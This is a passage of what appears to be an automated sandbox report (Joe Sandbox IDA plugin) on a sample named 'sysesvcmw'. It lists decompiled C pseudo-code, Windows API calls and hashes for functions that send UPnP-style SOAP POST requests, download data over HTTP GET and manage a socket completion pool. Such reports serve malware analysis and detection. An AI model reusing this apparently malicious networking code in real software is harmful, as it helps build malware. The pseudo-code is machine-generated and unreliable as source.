                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                                    							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                                    								_v856 = 0;
                                                                                                                                                                                                                                                                                    								while(1 != 0) {
                                                                                                                                                                                                                                                                                    									_t98 = _v848;
                                                                                                                                                                                                                                                                                    									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                                    										_v776 = E00408B60(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                                    										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                                    										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                                    										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *_a16 = _v856;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040cd69
                                                                                                                                                                                                                                                                                    0x0040cd73
                                                                                                                                                                                                                                                                                    0x0040cd88
                                                                                                                                                                                                                                                                                    0x0040cd8d
                                                                                                                                                                                                                                                                                    0x0040cd90
                                                                                                                                                                                                                                                                                    0x0040cda0
                                                                                                                                                                                                                                                                                    0x0040cda6
                                                                                                                                                                                                                                                                                    0x0040cdb6
                                                                                                                                                                                                                                                                                    0x0040cdbc
                                                                                                                                                                                                                                                                                    0x0040cdd8
                                                                                                                                                                                                                                                                                    0x0040cdf1
                                                                                                                                                                                                                                                                                    0x0040cdfe
                                                                                                                                                                                                                                                                                    0x0040ce2a
                                                                                                                                                                                                                                                                                    0x0040ce37
                                                                                                                                                                                                                                                                                    0x0040ce60
                                                                                                                                                                                                                                                                                    0x0040ce6d
                                                                                                                                                                                                                                                                                    0x0040ce85
                                                                                                                                                                                                                                                                                    0x0040ce8b
                                                                                                                                                                                                                                                                                    0x0040ceb7
                                                                                                                                                                                                                                                                                    0x0040cebd
                                                                                                                                                                                                                                                                                    0x0040cec7
                                                                                                                                                                                                                                                                                    0x0040cee7
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf1f
                                                                                                                                                                                                                                                                                    0x0040cf40
                                                                                                                                                                                                                                                                                    0x0040cf45
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf9a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040CD88
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CDD8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CDEB
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CE24
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CE5A
                                                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CE85
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,004108D0,000000FF,00009E34), ref: 0040CEAF
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CEEE
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040CF40
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF71
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF7E
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF8B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                                    • Opcode ID: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction ID: ea500a29b1865390ea74af70c7a13144c6f50436d918f4b951375f33d6e11f24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A512CB5900228ABDB26DF54CC94BD973BDAB48705F1081E9B60DA62C0C7B86FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E0040E0E0(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				long _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				LONG* _t62;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = __edi;
                                                                                                                                                                                                                                                                                    				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                                    					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                                    						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    						_t56 = 0;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							E0040BC90( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                                    							E0040BDD0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                                    							E00409600( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                                    							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                                    							return E00408C70(_t53);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                                                                    						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                                    								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                                    								if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                                    									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                                    									if(E0040E730(_t55) == 0) {
                                                                                                                                                                                                                                                                                    										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                                    					} while (_t55 != 0);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040e0e0
                                                                                                                                                                                                                                                                                    0x0040e0e2
                                                                                                                                                                                                                                                                                    0x0040e217
                                                                                                                                                                                                                                                                                    0x0040e0f4
                                                                                                                                                                                                                                                                                    0x0040e0f6
                                                                                                                                                                                                                                                                                    0x0040e0fa
                                                                                                                                                                                                                                                                                    0x0040e100
                                                                                                                                                                                                                                                                                    0x0040e105
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e194
                                                                                                                                                                                                                                                                                    0x0040e19e
                                                                                                                                                                                                                                                                                    0x0040e1a4
                                                                                                                                                                                                                                                                                    0x0040e1a9
                                                                                                                                                                                                                                                                                    0x0040e1c3
                                                                                                                                                                                                                                                                                    0x0040e1c9
                                                                                                                                                                                                                                                                                    0x0040e1d2
                                                                                                                                                                                                                                                                                    0x0040e1e4
                                                                                                                                                                                                                                                                                    0x0040e1ea
                                                                                                                                                                                                                                                                                    0x0040e1f0
                                                                                                                                                                                                                                                                                    0x0040e1fa
                                                                                                                                                                                                                                                                                    0x0040e202
                                                                                                                                                                                                                                                                                    0x0040e206
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e216
                                                                                                                                                                                                                                                                                    0x0040e1b1
                                                                                                                                                                                                                                                                                    0x0040e1bb
                                                                                                                                                                                                                                                                                    0x0040e1bd
                                                                                                                                                                                                                                                                                    0x0040e1be
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e111
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e137
                                                                                                                                                                                                                                                                                    0x0040e13e
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e14c
                                                                                                                                                                                                                                                                                    0x0040e152
                                                                                                                                                                                                                                                                                    0x0040e15c
                                                                                                                                                                                                                                                                                    0x0040e162
                                                                                                                                                                                                                                                                                    0x0040e16c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e17c
                                                                                                                                                                                                                                                                                    0x0040e17c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e182
                                                                                                                                                                                                                                                                                    0x0040e188
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000020,0040B950,?,0040EC84), ref: 0040E0FA
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E126
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E13E
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0040E16C
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E17C
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000020,?,0040EC84), ref: 0040E194
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040EC84), ref: 0040E19E
                                                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040EC84), ref: 0040E1BB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1E4
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E1EA
                                                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 0040E1F0
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040EC84), ref: 0040E206
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: 91e1793f966389e5c05c026e5a2b2959d1c39894ae16f0b550b690b40fcb3971
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e090b2b2d95b5b5db58c8e8021d4e4c0217c2d5e17fa086addfc70fe82b675d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91e1793f966389e5c05c026e5a2b2959d1c39894ae16f0b550b690b40fcb3971
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E319871500705BBD7109F71EC48F97B7A8BF09300F048A2EE959A7691C778F9A4CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040C260(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				long _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				void _v1876;
                                                                                                                                                                                                                                                                                    				long _v1880;
                                                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                                    								if(_a8 == 0) {
                                                                                                                                                                                                                                                                                    									_v776 = 1;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v852 = 0;
                                                                                                                                                                                                                                                                                    									while(1 != 0) {
                                                                                                                                                                                                                                                                                    										_t87 = _v848;
                                                                                                                                                                                                                                                                                    										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                                    											_v776 = E00408B60(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                                    											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                                    											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                                    											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									 *_a8 = _v852;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x0040c269
                                                                                                                                                                                                                                                                                    0x0040c273
                                                                                                                                                                                                                                                                                    0x0040c288
                                                                                                                                                                                                                                                                                    0x0040c28d
                                                                                                                                                                                                                                                                                    0x0040c290
                                                                                                                                                                                                                                                                                    0x0040c2a0
                                                                                                                                                                                                                                                                                    0x0040c2a6
                                                                                                                                                                                                                                                                                    0x0040c2b6
                                                                                                                                                                                                                                                                                    0x0040c2bc
                                                                                                                                                                                                                                                                                    0x0040c2d8
                                                                                                                                                                                                                                                                                    0x0040c2ee
                                                                                                                                                                                                                                                                                    0x0040c2fb
                                                                                                                                                                                                                                                                                    0x0040c327
                                                                                                                                                                                                                                                                                    0x0040c334
                                                                                                                                                                                                                                                                                    0x0040c35d
                                                                                                                                                                                                                                                                                    0x0040c36a
                                                                                                                                                                                                                                                                                    0x0040c387
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c446
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c397
                                                                                                                                                                                                                                                                                    0x0040c3a1
                                                                                                                                                                                                                                                                                    0x0040c3c1
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c3f9
                                                                                                                                                                                                                                                                                    0x0040c41a
                                                                                                                                                                                                                                                                                    0x0040c41f
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c480

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040C41A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C464
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C471
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                                    • Opcode ID: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction ID: fb11e20dfced737966d96b67562c2227f08ee783dca279ae1717ab20ae365a52
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513EB1941228ABDB36CB50CC95BE973BCBB44705F0081E9A60DAA2C0D7B96FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E0040BC90(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				LONG* _v16;
                                                                                                                                                                                                                                                                                    				signed char _v17;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                                                                    
